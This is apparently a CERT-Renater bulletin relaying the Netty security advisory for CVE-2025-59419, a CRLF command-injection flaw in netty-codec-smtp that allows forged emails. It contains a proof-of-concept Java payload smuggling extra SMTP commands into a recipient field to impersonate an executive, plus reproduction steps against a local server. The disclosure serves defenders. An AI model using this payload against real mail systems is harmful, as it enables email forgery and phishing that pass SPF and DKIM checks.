Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN709
_____________________________________________________________________

DATE                : 16/10/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running netty-codec-smtp versions prior
                             to 4.2.7.Final, 4.1.128.Final.

=====================================================================
https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86
_____________________________________________________________________


SMTP Command Injection Vulnerability Allowing Email Forgery
Moderate
normanmaurer published GHSA-jq43-27x9-3v86 Oct 15, 2025

Package
io.netty:netty-codec-smtp (Maven)

Affected versions
<= 4.2.7.Final, <= 4.1.128.Final

Patched versions
4.2.7.Final, 4.1.128.Final


Description

Summary

An SMTP Command Injection (CRLF Injection) vulnerability in Netty's
SMTP codec allows a remote attacker who can control SMTP command
parameters (e.g., an email recipient) to forge arbitrary emails
from the trusted server. This bypasses standard email authentication
and can be used to impersonate executives and forge high-stakes
corporate communications.


Details

The root cause is the lack of input validation for Carriage Return
(\r) and Line Feed (\n) characters in user-supplied parameters.

The vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest,
where parameters are directly concatenated into the SMTP command
string. For example, when SmtpRequests.rcpt(recipient) is called,
a malicious recipient string containing CRLF sequences can inject a
new, separate SMTP command.

Because the injected commands are sent from the server's trusted
IP, any resulting emails will likely pass SPF and DKIM checks,
making them appear legitimate to the victim's email client.


PoC

A minimal PoC involves passing a crafted string containing CRLF
sequences to any SmtpRequest that accepts user-controlled
parameters.

1. Malicious Payload

The core of the exploit is the payload, where new SMTP commands are
injected into a parameter.

// The legitimate recipient is followed by an injected email sequence
String injected_recipient = "legit-recipient@example.com\r\n" +
                          "MAIL FROM:<ceo@trusted-domain.com>\r\n" +
                          "RCPT TO:<victim@anywhere.com>\r\n" +
                          "DATA\r\n" +
                          "From: ceo@trusted-domain.com\r\n" +
                          "To: victim@anywhere.com\r\n" +
                          "Subject: Urgent: Phishing Email\r\n" +
                          "\r\n" +
                          "This is a forged email that will pass authentication checks.\r\n" +
                          ".\r\n" +
                          "QUIT\r\n";


2. Triggering the Vulnerability

The vulnerability is triggered when this payload is used to
create an SMTP request.

// The Netty SMTP codec will fail to sanitize this input
SmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient);

// When this request is sent to an SMTP server, the injected commands
// will be executed, sending a forged email.
channel.writeAndFlush(maliciousRequest);


3. Full Reproduction Steps

A complete, runnable PoC is available as a GitHub Gist to
demonstrate the full attack flow against a local SMTP server

    Full PoC Code: https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c

To run the full PoC:

    Set up a local SMTP server. The easiest way is using MailHog:
        On macOS: brew install mailhog && mailhog
        Using Docker: docker run -p 1025:1025 -p 8025:8025
mailhog/mailhog
    Run the PoC code. The code will connect to the SMTP server at
localhost:1025 and send the malicious payload.
    Verify the result. Open the MailHog web UI at http://localhost:8025.
You will see the forged email sent to victim@anywhere.com
from ceo@trusted-domain.com.


Impact

This is a SMTP Command Injection vulnerability. It impacts any
application using netty-codec-smtp to construct SMTP requests where
an attacker can control or influence any of the SMTP string
parameters (e.g., from, recipient, helo hostname).

The primary impacts are:

    Economic Manipulation & Disinformation: Attackers can forge
emails from high-value targets (e.g., corporate executives, government
officials) and send them to journalists, financial institutions, or
the public. A fraudulent email announcing false financial results,
a fake merger, or a security breach could be used to manipulate stock
prices or cause significant economic disruption.

    Sophisticated Phishing: Attackers can send high-fidelity phishing
emails that bypass email authentication (SPF/DKIM) and appear to come
from a trusted source, making them highly likely to deceive users.


Severity
Moderate

CVE ID
CVE-2025-59419

Weaknesses
No CWEs


Credits

    @DepthFirstDisclosures DepthFirstDisclosures Reporter



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================